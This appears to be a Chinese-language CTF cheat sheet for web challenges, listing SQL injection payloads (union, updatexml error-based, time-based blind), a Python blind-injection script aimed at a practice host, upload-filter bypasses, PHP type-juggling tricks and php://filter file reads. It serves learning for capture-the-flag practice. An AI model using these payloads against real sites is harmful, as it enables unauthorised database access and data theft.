CTF 常见操作总结
一般流程
- 首先看header, veiwsource, 目录扫描
- 有登陆, 尝试sql注入&爆破
- 有数据库, 必然sql注入?
普通sql注入
判断是否存在回显异常
尝试单双引号查是字符型?数值型?
若1'#成功查询, 则是字符型
若失败则是数值型确定字段数
1' order by 3# , 意思是按第三参数排序, 若报错则没有第三字段确定返回值类型(需要么?参见bugku学生管理)
0' union select 1, 2, 3, 4 #不可
0' union select '1', '2', '3', '4' #可确定offset
1' union select '1', '2', '3', '4' # 仅有id=1的数据
0' union select '1', '2', '3', '4' # 仅有1234数据database()
information_schema.tables (使用group_concat)
information_schema.columns (使用group_concat)
查字段
带字符串过滤的sql注入
异或测试过滤
1'^(length('and')0)
1'^(length('asdasd')0)
测试结果若与下面的不同, 则存在and的过滤双写绕过, 大小写绕过
空格过滤
/x/充当空格若上面的绕过union失效, 尝试updatexml(但需要异常回显)
1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
sql约束攻击
类似与在提供了注册功能的同时, 需要登陆admin帐号的情况下使用
注册时:
username=admin a&&passwd=passwd
因为sql由于字符串长度限制, 所以查询时截断username, 误认为admin, 登陆
但实测user(name varchar(20))下insert数据, 长度过长会报错, 所以这种攻击是否有效就另说了?
insert into类型sql注入
- 基于时间的sql注入
'+"+"(select case when substr((select table_name from information_schema.tables where table_schema=(select database()) limit 1 offset 0) from 0 for 1)='a' then sleep(30) else 0 end)) #
import requests as req
from lxml import etree
import base64
from tqdm import tqdm
url='http://123.206.87.240:8002/web15/'
# payload="'+"+"(select case when substr((select table_name from information_schema.tables where table_schema=(select database()) limit 1 offset %d) from %d for 1)='%s' then sleep(30) else 0 end)) #"
payload="'+"+"(select case when substr((select * from flag from %d for 1)='%s' then sleep(30) else 0 end)) #"
dic="1234567890qwertyuiopasdfghjklzxcvbnm"
dbname="w111111111111111111"
tablename=[]
for ti in range(1):
tmp=''
for i in range(1, 21):
check=False
for ch in dic:
try:
print(payload%(i, ch))
resp=req.get(url, headers={'X-Forwarded-For': payload%(i, ch)}, timeout=3)
except:
tmp+=ch
print(tmp)
check=True
break
if check==False: break
tablename.append(tmp)
print(tablename)
基于regex的sql注入
详见:https://blog.csdn.net/hwz2311245/article/details/53941523基于异常的sql注入
链接同上
文件上传
此处用burpsuite操作
- 请求头的Content-Type大小写绕过
- 请求数据的Content-Type改为image/png等
- 文件后缀黑名单php, php4, php5, phps, phtml, phtm绕过
- 屏蔽<?php: 用<?= 或
绕过
x==0
字符串绕过x==null
%20绕过is_numeric(x)false && x1
1%00123 字符截断
1%20123 空格字符
(%00123 绕过is_numeric()false, x1不能)
(%20123 不能绕过is_numeric()==false)
- is_numeric(x)==true && sql注入
二次注入, x专成16进制即可
select hex('test');
-> 0x74657374
md5(x) == md5(y) && x!=y
数组绕过x[]=x&y[]=y
sha1同理md5(x) === md5(y)
strcmp($x, $flag)==0
Php5.3之后版本使用strcmp比较一个字符串和数组的话,将不再返回-1而是返回0true == "0"
字符串绕过
php技巧
GLOBALS变量
文件包含 php://filter/read=convert.base64-encode/resource=flag.php
php://input
可将数据放入rawbody传数组burpsuite下
numbers[]="0,0,0"
numbers=[0,0,0]
HTTP
- X-Forwarded-For设置ip
事实上反代服务器也会写上XFF之类的header
X-Forwarded-For:Squid 服务代理
Proxy-Client-IP:apache 服务代理
WL-Proxy-Client-IP:weblogic 服务代理
HTTP_CLIENT_IP:有些代理服务器
X-Real-IP:nginx服务代理
编码
- HTML编码
KEY{J2sa42ahJK-HS11III}
KEY{J2sa42ahJK-HS11III}
Base64
urlencode
// js
escape('!#') // "%21%23"
unescape('%21%23"') // !#
其他
如何做到POST的同时给出GET参数?
postman: POST同时url上写GET参数, from-data写POST数据
hackbar: enable post data即可JSFuck
问题
";if(!$_GET['id'])
{
header('Location: hello.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'no no no no no no no';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("f4l2a3g.txt");
}
else
{
print "never never never give up !!!";
}
?>
http://123.206.87.240:8006/test/hello.php?id=0&b=%004123123&a=php://input
为何id=0不能通过?
CTF 常见操作总结的更多相关文章
- 动态单链表的传统存储方式和10种常见操作-C语言实现
顺序线性表的优点:方便存取(随机的),特点是物理位置和逻辑为主都是连续的(相邻).但是也有不足,比如:前面的插入和删除算法,需要移动大量元素,浪费时间,那么链式线性表 (简称链表) 就能解决这个问题. ...
- C#路径/文件/目录/I/O常见操作汇总
文件操作是程序中非常基础和重要的内容,而路径.文件.目录以及I/O都是在进行文件操作时的常见主题,这里想把这些常见的问题作个总结,对于每个问题,尽量提供一些解决方案,即使没有你想要的答案,也希望能提供 ...
- X-Cart 学习笔记(四)常见操作
目录 X-Cart 学习笔记(一)了解和安装X-Cart X-Cart 学习笔记(二)X-Cart框架1 X-Cart 学习笔记(三)X-Cart框架2 X-Cart 学习笔记(四)常见操作 五.常见 ...
- 转:jQuery 常见操作实现方式
http://www.cnblogs.com/guomingfeng/articles/2038707.html 一个优秀的 JavaScript 框架,一篇 jQuery 常用方法及函数的文章留存备 ...
- jQuery 常见操作实现方式
一个优秀的 JavaScript 框架,一篇 jQuery 常用方法及函数的文章留存备忘. jQuery 常见操作实现方式 $("标签名") //取html元素 document. ...
- C#路径/文件/目录/I/O常见操作汇总<转载>
文件操作是程序中非常基础和重要的内容,而路径.文件.目录以及I/O都是在进行文件操作时的常见主题,这里想把这些常见的问题作个总结,对于每个问题,尽量提供一些解决方案,即使没有你想要的答案,也希望能提供 ...
- [java学习笔记]java语言基础概述之数组的定义&常见操作(遍历、排序、查找)&二维数组
1.数组基础 1.什么是数组: 同一类型数据的集合,就是一个容器. 2.数组的好处: 可以自动为数组中的元素从零开始编号,方便操作这些数据. 3.格式: (一 ...
- 【转】C#路径/文件/目录/I/O常见操作汇总
文件操作是程序中非常基础和重要的内容,而路径.文件.目录以及I/O都是在进行文件操作时的常见主题,这里想把这些常见的问题作个总结,对于每个问题,尽量提供一些解决方案,即使没有你想要的答案,也希望能提供 ...
- C#路径,文件,目录,I/O常见操作
C#路径,文件,目录,I/O常见操作 文件操作是程序中非常基础和重要的内容,而路径.文件.目录以及I/O都是在进行文件操作时的常见主题,这里想把这些常见的问题作个总结,对于每个问题,尽量提供 ...
随机推荐
- APScheduler 3.0.1浅析
简介 APScheduler是一个小巧而强大的Python类库,通过它你可以实现类似Unix系统cronjob类似的定时任务系统.使用之余,阅读一下源码,一方面有助于更好的使用它,另一方面,个人认为a ...
- ios-动态添加方法,交换方法,重定向方法
新建一个类Person,Person.h 不写代码,Person.m 有如下两个方法: - (void)eat { NSLog(@"xxx eat===="); } [动态添加方法 ...
- [转]Nginx配置信息详解
序言 Nginx是lgor Sysoev为俄罗斯访问量第二的rambler.ru站点设计开发的.从2004年发布至今,凭借开源的力量,已经接近成熟与完善. Nginx功能丰富,可作为HTTP服务器,也 ...
- java.io.IOException: Cleartext HTTP traffic to xxx.xxx.xxx.xxx not permitted
java.io.IOException: Cleartext HTTP traffic to xxx.xxx.xxx.xxx not permitted 转 https://blog.csdn.net ...
- java+服务器上传和下载文件
1.介绍enctype enctype 属性规定发送到服务器之前应该如何对表单数据进行编码. enctype作用是告知服务器请求正文的MIME类型(请求消息头content-type的作用一样) 1. ...
- C2B电商三种主要模式的分析_数据分析师
C2B电商三种主要模式的分析_数据分析师 在过去的一年中电商领域血雨腥风,尤其是天猫.京东.苏宁.当当.易讯等B2C电商打得不亦乐乎.而随着B2C领域竞争进入白热化阶段,C2B模式也在天猫" ...
- .Net Core 2.*+ InfluxDB+Grafana+App Metrics实时性能监控
前言 .net core 2.* 实施性能监控 这个工具其实给运维 大大们用起来是更爽的.但是Grafana现在还没有找到中文版. 本文需要了解的相关技术与内容: InfluxDb(分布式时序数据库, ...
- nginx+gunicorn拓扑
加装Nginx是否有必要 Nginx作为代理服务器,监听来自外部的80端口的请求:而Gunicorn负责监听本地机8000端口的请求.Nginx会把来自外部的请求转发给Gunicorn处理,接收到响应 ...
- 深入理解C语言-二级指针三种内存模型
二级指针相对于一级指针,显得更难,难在于指针和数组的混合,定义不同类型的二级指针,在使用的时候有着很大的区别 第一种内存模型char *arr[] 若有如下定义 char *arr[] = {&quo ...
- Thinkphp 使用小结
分页中带查询参数 ...->paginate(15,false,['query'=>request()->param()]); 队列后台自动开启运行 nohup php think ...